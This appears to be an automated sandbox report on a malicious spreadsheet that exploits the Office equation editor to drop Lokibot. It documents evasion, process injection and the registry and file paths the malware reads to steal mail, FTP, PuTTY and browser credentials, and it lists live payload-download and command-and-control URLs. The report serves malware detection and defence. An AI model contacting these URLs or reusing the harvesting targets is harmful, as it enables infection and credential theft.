              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2364Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe TID: 2836Thread sleep time: -1020000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeThread delayed: delay time: 60000
              Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeAPI call chain: ExitProcess graph end node
              Source: vbc.exe, 00000004.00000002.465419977.0000000000894000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B0EEB _memset,IsDebuggerPresent,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B1B15 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AF18E GetProcessHeap,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AE750 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120402 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120616 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_001206C7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120706 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120744 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AE750 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFEB0 SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFEB0 SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory written: C:\Users\user\AppData\Local\Temp\xmtxpy.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B350C cpuid
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AF9DD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00406069 GetUserNameW,

              Stealing of Sensitive Information

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: PopPassword
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: SmtpPassword
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts12
              Native API              		Path Interception1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium15
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts13
              Exploitation for Client Execution              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		2
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol1
              Man in the Browser              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)111
              Process Injection              		1
              Extra Window Memory Injection              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares2
              Data from Local System              		Automated Exfiltration4
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
              Masquerading              		NTDS26
              System Information Discovery              		Distributed Component Object Model1
              Email Collection              		Scheduled Transfer124
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Virtualization/Sandbox Evasion              		LSA Secrets131
              Security Software Discovery              		SSH1
              Clipboard Data              		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Process Injection              		DCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Remote System Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 569962 Sample: _2201S_BUSAN_HOCHIMINH_.xlsx Startdate: 10/02/2022 Architecture: WINDOWS Score: 100 38 asiaoil.bar 2->38 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 15 other signatures 2->54 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 33 27 2->14         started        signatures3 process4 dnsIp5 44 198.46.132.195, 49165, 80 AS-COLOCROSSINGUS United States 9->44 32 C:\Users\user\AppData\Local\...\.win32[1].exe, PE32 9->32 dropped 34 C:\Users\Public\vbc.exe, PE32 9->34 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->70 16 vbc.exe 19 9->16         started        36 C:\Users\...\~$_2201S_BUSAN_HOCHIMINH_.xlsx, data 14->36 dropped file6 signatures7 process8 file9 28 C:\Users\user\AppData\Local\Temp\xmtxpy.exe, PE32 16->28 dropped 46 Machine Learning detection for dropped file 16->46 20 xmtxpy.exe 16->20         started        signatures10 process11 signatures12 56 Tries to steal Mail credentials (via file registry) 20->56 58 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 20->58 60 Injects a PE file into a foreign processes 20->60 23 xmtxpy.exe 54 20->23         started        process13 dnsIp14 40 104.21.49.244, 49170, 49172, 49174 CLOUDFLARENETUS United States 23->40 42 asiaoil.bar 172.67.197.66, 49166, 49167, 49168 CLOUDFLARENETUS United States 23->42 30 C:\Users\user\AppData\...\5879F5.exe (copy), PE32 23->30 dropped 62 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->62 64 Tries to steal Mail credentials (via file / registry access) 23->64 66 Tries to harvest and steal ftp login credentials 23->66 68 Tries to harvest and steal browser information (history, passwords, etc) 23->68 file15 signatures16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              _2201S_BUSAN_HOCHIMINH_.xlsx35%VirustotalBrowse
              _2201S_BUSAN_HOCHIMINH_.xlsx33%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe21%VirustotalBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe23%ReversingLabsWin32.Backdoor.Androm

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              6.0.xmtxpy.exe.400000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.2.xmtxpy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.2.xmtxpy.exe.130000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://198.46.132.195/windowSSH/.win32.exe8%VirustotalBrowse
              http://198.46.132.195/windowSSH/.win32.exe100%Avira URL Cloudmalware
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://asiaoil.bar//bobby/five/fre.php1%VirustotalBrowse
              http://asiaoil.bar//bobby/five/fre.php100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              asiaoil.bar
              		172.67.197.66
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://198.46.132.195/windowSSH/.win32.exetrue
                • 8%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://asiaoil.bar//bobby/five/fre.phptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drfalse
                  		high
